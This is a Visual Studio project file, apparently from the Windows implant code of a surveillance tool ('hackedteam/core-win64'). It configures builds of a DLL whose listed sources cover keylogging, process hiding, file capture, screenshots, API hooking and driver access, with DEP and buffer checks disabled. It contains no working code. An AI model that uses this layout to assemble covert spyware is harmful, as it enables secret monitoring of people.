hackedteam/core-win64

View on GitHub
H64DLL.vcproj

Summary

Maintainability
Test Coverage
<?xml version="1.0" encoding="Windows-1252"?>
<VisualStudioProject
    ProjectType="Visual C++"
    Version="9,00"
    Name="H64DLL"
    ProjectGUID="{B149B0CB-E46F-4CFF-B937-BFAF18860B66}"
    RootNamespace="H4DLL"
    Keyword="Win32Proj"
    TargetFrameworkVersion="131072"
    >
    <Platforms>
        <Platform
            Name="Win32"
        />
        <Platform
            Name="x64"
        />
    </Platforms>
    <ToolFiles>
        <ToolFile
            RelativePath=".\masm.rules"
        />
    </ToolFiles>
    <Configurations>
        <Configuration
            Name="Debug|Win32"
            OutputDirectory="Debug"
            IntermediateDirectory="Debug"
            ConfigurationType="2"
            InheritedPropertySheets="$(VCInstallDir)VCProjectDefaults\UpgradeFromVC70.vsprops"
            CharacterSet="2"
            >
            <Tool
                Name="VCPreBuildEventTool"
            />
            <Tool
                Name="VCCustomBuildTool"
            />
            <Tool
                Name="MASM"
            />
            <Tool
                Name="VCXMLDataGeneratorTool"
            />
            <Tool
                Name="VCWebServiceProxyGeneratorTool"
            />
            <Tool
                Name="VCMIDLTool"
            />
            <Tool
                Name="VCCLCompilerTool"
                Optimization="0"
                PreprocessorDefinitions="WIN32;_DEBUG;_WINDOWS;_USRDLL;H4DLL_EXPORTS"
                MinimalRebuild="true"
                BasicRuntimeChecks="3"
                RuntimeLibrary="1"
                UsePrecompiledHeader="0"
                WarningLevel="0"
                Detect64BitPortabilityProblems="false"
                DebugInformationFormat="4"
            />
            <Tool
                Name="VCManagedResourceCompilerTool"
            />
            <Tool
                Name="VCResourceCompilerTool"
            />
            <Tool
                Name="VCPreLinkEventTool"
            />
            <Tool
                Name="VCLinkerTool"
                AdditionalDependencies="Ws2_32.lib Winhttp.lib Kernel32.lib Psapi.lib Winmm.lib Oleacc.lib Imagehlp.lib Crypt32.lib Vfw32.lib"
                OutputFile="$(OutDir)/H4DLL.dll"
                LinkIncremental="2"
                ModuleDefinitionFile="H4-DLL.def"
                GenerateDebugInformation="true"
                ProgramDatabaseFile="$(OutDir)/H4DLL.pdb"
                SubSystem="2"
                RandomizedBaseAddress="1"
                DataExecutionPrevention="0"
                ImportLibrary="$(OutDir)/H4DLL.lib"
                TargetMachine="1"
            />
            <Tool
                Name="VCALinkTool"
            />
            <Tool
                Name="VCManifestTool"
            />
            <Tool
                Name="VCXDCMakeTool"
            />
            <Tool
                Name="VCBscMakeTool"
            />
            <Tool
                Name="VCFxCopTool"
            />
            <Tool
                Name="VCAppVerifierTool"
            />
            <Tool
                Name="VCPostBuildEventTool"
            />
        </Configuration>
        <Configuration
            Name="Debug|x64"
            OutputDirectory="$(PlatformName)\$(ConfigurationName)"
            IntermediateDirectory="$(PlatformName)\$(ConfigurationName)"
            ConfigurationType="2"
            InheritedPropertySheets="$(VCInstallDir)VCProjectDefaults\UpgradeFromVC70.vsprops"
            CharacterSet="2"
            >
            <Tool
                Name="VCPreBuildEventTool"
            />
            <Tool
                Name="VCCustomBuildTool"
            />
            <Tool
                Name="MASM"
            />
            <Tool
                Name="VCXMLDataGeneratorTool"
            />
            <Tool
                Name="VCWebServiceProxyGeneratorTool"
            />
            <Tool
                Name="VCMIDLTool"
                TargetEnvironment="3"
            />
            <Tool
                Name="VCCLCompilerTool"
                Optimization="0"
                PreprocessorDefinitions="WIN32;_DEBUG;_WINDOWS;_USRDLL;H4DLL_EXPORTS"
                MinimalRebuild="true"
                BasicRuntimeChecks="3"
                RuntimeLibrary="1"
                UsePrecompiledHeader="0"
                WarningLevel="0"
                Detect64BitPortabilityProblems="false"
                DebugInformationFormat="3"
            />
            <Tool
                Name="VCManagedResourceCompilerTool"
            />
            <Tool
                Name="VCResourceCompilerTool"
            />
            <Tool
                Name="VCPreLinkEventTool"
            />
            <Tool
                Name="VCLinkerTool"
                AdditionalDependencies="Ws2_32.lib Winhttp.lib Kernel32.lib Psapi.lib Winmm.lib Oleacc.lib Imagehlp.lib Crypt32.lib Vfw32.lib"
                OutputFile="$(OutDir)/H4DLL.dll"
                LinkIncremental="2"
                ModuleDefinitionFile="H4-DLL.def"
                GenerateDebugInformation="true"
                ProgramDatabaseFile="$(OutDir)/H4DLL.pdb"
                SubSystem="2"
                RandomizedBaseAddress="1"
                DataExecutionPrevention="0"
                ImportLibrary="$(OutDir)/H4DLL.lib"
                TargetMachine="17"
            />
            <Tool
                Name="VCALinkTool"
            />
            <Tool
                Name="VCManifestTool"
            />
            <Tool
                Name="VCXDCMakeTool"
            />
            <Tool
                Name="VCBscMakeTool"
            />
            <Tool
                Name="VCFxCopTool"
            />
            <Tool
                Name="VCAppVerifierTool"
            />
            <Tool
                Name="VCPostBuildEventTool"
            />
        </Configuration>
        <Configuration
            Name="Release|Win32"
            OutputDirectory="Release"
            IntermediateDirectory="Release"
            ConfigurationType="2"
            InheritedPropertySheets="$(VCInstallDir)VCProjectDefaults\UpgradeFromVC70.vsprops"
            CharacterSet="2"
            >
            <Tool
                Name="VCPreBuildEventTool"
            />
            <Tool
                Name="VCCustomBuildTool"
            />
            <Tool
                Name="MASM"
            />
            <Tool
                Name="VCXMLDataGeneratorTool"
            />
            <Tool
                Name="VCWebServiceProxyGeneratorTool"
            />
            <Tool
                Name="VCMIDLTool"
            />
            <Tool
                Name="VCCLCompilerTool"
                Optimization="2"
                InlineFunctionExpansion="1"
                OmitFramePointers="true"
                AdditionalIncludeDirectories=""
                PreprocessorDefinitions="WIN64;NDEBUG;_WINDOWS;_USRDLL;H4DLL_EXPORTS;_WIN32_WINNT=_WIN32_WINNT_WIN2K"
                StringPooling="true"
                ExceptionHandling="2"
                RuntimeLibrary="0"
                BufferSecurityCheck="false"
                EnableFunctionLevelLinking="true"
                UsePrecompiledHeader="0"
                WarningLevel="0"
                Detect64BitPortabilityProblems="true"
                DebugInformationFormat="3"
            />
            <Tool
                Name="VCManagedResourceCompilerTool"
            />
            <Tool
                Name="VCResourceCompilerTool"
            />
            <Tool
                Name="VCPreLinkEventTool"
            />
            <Tool
                Name="VCLinkerTool"
                AdditionalDependencies="netapi32.lib winhttp.lib WS2_32.lib Psapi.lib shlwapi.lib Winmm.lib Crypt32.lib Vfw32.lib oleacc.lib imagehlp.lib Version.lib"
                OutputFile="$(OutDir)/H4DLL.dll"
                LinkIncremental="1"
                AdditionalLibraryDirectories=""
                ModuleDefinitionFile="H4-DLL.def"
                GenerateDebugInformation="false"
                SubSystem="2"
                OptimizeReferences="2"
                EnableCOMDATFolding="2"
                RandomizedBaseAddress="1"
                DataExecutionPrevention="0"
                ImportLibrary="$(OutDir)/H4DLL.lib"
                TargetMachine="17"
            />
            <Tool
                Name="VCALinkTool"
            />
            <Tool
                Name="VCManifestTool"
                EmbedManifest="false"
            />
            <Tool
                Name="VCXDCMakeTool"
            />
            <Tool
                Name="VCBscMakeTool"
            />
            <Tool
                Name="VCFxCopTool"
            />
            <Tool
                Name="VCAppVerifierTool"
            />
            <Tool
                Name="VCPostBuildEventTool"
            />
        </Configuration>
        <Configuration
            Name="Release|x64"
            OutputDirectory="$(PlatformName)\$(ConfigurationName)"
            IntermediateDirectory="$(PlatformName)\$(ConfigurationName)"
            ConfigurationType="2"
            InheritedPropertySheets="$(VCInstallDir)VCProjectDefaults\UpgradeFromVC70.vsprops"
            CharacterSet="2"
            >
            <Tool
                Name="VCPreBuildEventTool"
            />
            <Tool
                Name="VCCustomBuildTool"
            />
            <Tool
                Name="MASM"
            />
            <Tool
                Name="VCXMLDataGeneratorTool"
            />
            <Tool
                Name="VCWebServiceProxyGeneratorTool"
            />
            <Tool
                Name="VCMIDLTool"
                TargetEnvironment="3"
            />
            <Tool
                Name="VCCLCompilerTool"
                Optimization="2"
                InlineFunctionExpansion="1"
                OmitFramePointers="true"
                AdditionalIncludeDirectories=""
                PreprocessorDefinitions="WIN64;NDEBUG;_WINDOWS;_USRDLL;H4DLL_EXPORTS;_WIN32_WINNT=_WIN32_WINNT_WIN2K"
                StringPooling="true"
                ExceptionHandling="2"
                RuntimeLibrary="0"
                BufferSecurityCheck="false"
                EnableFunctionLevelLinking="true"
                UsePrecompiledHeader="0"
                WarningLevel="0"
                Detect64BitPortabilityProblems="false"
                DebugInformationFormat="3"
            />
            <Tool
                Name="VCManagedResourceCompilerTool"
            />
            <Tool
                Name="VCResourceCompilerTool"
            />
            <Tool
                Name="VCPreLinkEventTool"
            />
            <Tool
                Name="VCLinkerTool"
                AdditionalDependencies="psapi.lib"
                OutputFile="$(OutDir)/H64DLL.dll"
                LinkIncremental="1"
                AdditionalLibraryDirectories=""
                ModuleDefinitionFile="H64-DLL.def"
                GenerateDebugInformation="false"
                SubSystem="2"
                OptimizeReferences="2"
                EnableCOMDATFolding="2"
                RandomizedBaseAddress="1"
                DataExecutionPrevention="0"
                ImportLibrary="$(OutDir)/H4DLL.lib"
                TargetMachine="17"
            />
            <Tool
                Name="VCALinkTool"
            />
            <Tool
                Name="VCManifestTool"
                EmbedManifest="false"
            />
            <Tool
                Name="VCXDCMakeTool"
            />
            <Tool
                Name="VCBscMakeTool"
            />
            <Tool
                Name="VCFxCopTool"
            />
            <Tool
                Name="VCAppVerifierTool"
            />
            <Tool
                Name="VCPostBuildEventTool"
            />
        </Configuration>
    </Configurations>
    <References>
    </References>
    <Files>
        <Filter
            Name="Source Files"
            Filter="cpp;c;cxx;def;odl;idl;hpj;bat;asm"
            >
            <File
                RelativePath=".\src\Main.cpp"
                >
            </File>
            <Filter
                Name="ASM"
                >
                <File
                    RelativePath=".\src\AsmHooks.asm"
                    >
                </File>
                <File
                    RelativePath=".\src\OpCodeParse.asm"
                    >
                </File>
            </Filter>
            <Filter
                Name="HOOKS"
                >
                <File
                    RelativePath=".\src\FileCapture.cpp"
                    >
                </File>
                <File
                    RelativePath=".\src\Hiding.cpp"
                    >
                </File>
                <File
                    RelativePath=".\src\Keylog_Mouse.cpp"
                    >
                </File>
                <File
                    RelativePath=".\src\Snapshots.cpp"
                    >
                </File>
            </Filter>
            <Filter
                Name="FRAMEWORK"
                >
                <File
                    RelativePath=".\src\Common.cpp"
                    >
                </File>
                <File
                    RelativePath=".\src\DriverAccess.cpp"
                    >
                </File>
                <File
                    RelativePath=".\src\Hooking.cpp"
                    >
                </File>
                <File
                    RelativePath=".\src\IPC.cpp"
                    >
                </File>
            </Filter>
        </Filter>
        <Filter
            Name="Header Files"
            Filter="h;hpp;hxx;hm;inl;inc"
            >
            <Filter
                Name="HOOKS"
                >
                <File
                    RelativePath=".\src\FileCapture.h"
                    >
                </File>
                <File
                    RelativePath=".\src\Hiding.h"
                    >
                </File>
                <File
                    RelativePath=".\src\Keylog_Mouse.h"
                    >
                </File>
                <File
                    RelativePath=".\src\Snapshots.h"
                    >
                </File>
            </Filter>
            <Filter
                Name="FRAMEWORK"
                >
                <File
                    RelativePath=".\src\Common.h"
                    >
                </File>
                <File
                    RelativePath=".\src\DriverAccess.h"
                    >
                </File>
                <File
                    RelativePath=".\src\Hooking.h"
                    >
                </File>
                <File
                    RelativePath=".\src\IPC.h"
                    >
                </File>
                <File
                    RelativePath=".\src\missing.h"
                    >
                </File>
            </Filter>
        </Filter>
        <File
            RelativePath=".\H64-DLL.def"
            >
        </File>
    </Files>
    <Globals>
    </Globals>
</VisualStudioProject>